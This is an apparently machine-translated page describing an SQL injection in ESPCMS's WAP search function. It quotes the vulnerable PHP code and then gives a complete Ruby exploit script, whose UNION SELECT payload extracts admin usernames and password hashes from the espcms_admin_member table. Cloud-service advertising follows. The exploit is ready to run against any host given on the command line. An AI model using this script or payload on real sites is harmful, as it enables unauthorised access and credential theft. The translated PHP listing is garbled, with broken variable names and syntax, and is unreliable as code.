The variable transfer process is $ _ SERVER ['query _ string']-> $ urlcode-> $ output-> $ value-> $ db_where-> $ SQL-> mysql_query, the whole process is not filtered, leading to injection. Because the variables are obtained from $ _ SERVER ['query _ string'], the filtering of the program is avoided. The injected variable is the value of the array, not the key of the array, so it has not been filtered. In combination, it forms a rare SQL injection. In the in_result function of the/interface/3gwap_search.php file:
Function in_result (){........................... // obtain data from $ _ SERVER ['query _ string'] $ urlcode = $ _ SERVER ['query _ string']; parse_str (html_entity_decode ($ urlcode ), $ output );........................... if (is_array ($ output ['attr ']) & count ($ output ['attr'])> 0) {$ db_table = db_prefix. 'model _ att '; foreach ($ output ['attr'] as $ key => $ value) {if ($ value) {// filter keys, ignored value $ key = Addslashes ($ key); $ key = $ this-> fun-> inputcodetrim ($ key); $ db_att_where = "WHERE isclass = 1 AND attrname = '$ key '"; // required here $ countnum> 0 $ countnum = $ this-> db_numrows ($ db_table, $ db_att_where); if ($ countnum> 0) {// value is spliced into the SQL statement $ db_where. = 'AND B. '. $ key. '= \''. $ value. '\ ''' ;}}} if (! Empty ($ keyword) & empty ($ keyname) {$ keyname = 'title'; $ db_where. = "AND. title like '% $ keyword %' ";} elseif (! Empty ($ keyword )&&! Empty ($ keyname) {$ db_where. = "AND $ keyname like '% $ keyword %'";} $ pagemax = 15; $ pagesylte = 1; if ($ countnum> 0) {$ numpage = ceil ($ countnum/$ pagemax);} else {$ numpage = 1;} // concatenate the SQL statement $ SQL = "SELECT B. *,. * FROM ". db_prefix. "document AS a left join ". db_prefix. "document_attr AS B ON. did = B. did ". $ db_where. 'limit 0 ,'. $ pagemax; $ this-> htmlpage = new PageBotton ($ SQL, $ pagemax, $ page, $ countnum, $ numpage, $ pagesylte, $ this-> CON ['file _ fileex '], 5, $ this-> lng ['pagebotton'], $ this-> lng ['gopageurl'], 0 ); $ SQL = $ this-> htmlpage-> PageSQL ('a. did', 'low '); // $ rs = $ this-> db-> query ($ SQL );.................... .......}
require "net/http"require "uri"def request(method, url) if method.eql?("get") uri = URI.parse(url) http = Net::HTTP.new(uri.host, uri.port) response = http.request(Net::HTTP::Get.new(uri.request_uri)) return response endenddoc =<<HERE-------------------------------------------------------Espcms Inejction ExploitAuthor:ztzBlog:http://ztz.fuzzexp.org/-------------------------------------------------------HEREusage =<<HEREUsage: ruby #{$0} host port pathexample: ruby #{$0} www.target.com 80 /HEREputs docif ARGV.length < 3 puts usageelse $host = ARGV[0] $port = ARGV[1] $path = ARGV[2] puts "[*]send request..." url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23" response = request("get", url) result = response.body.scan(/\w+&\w{32}/) puts resultend
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
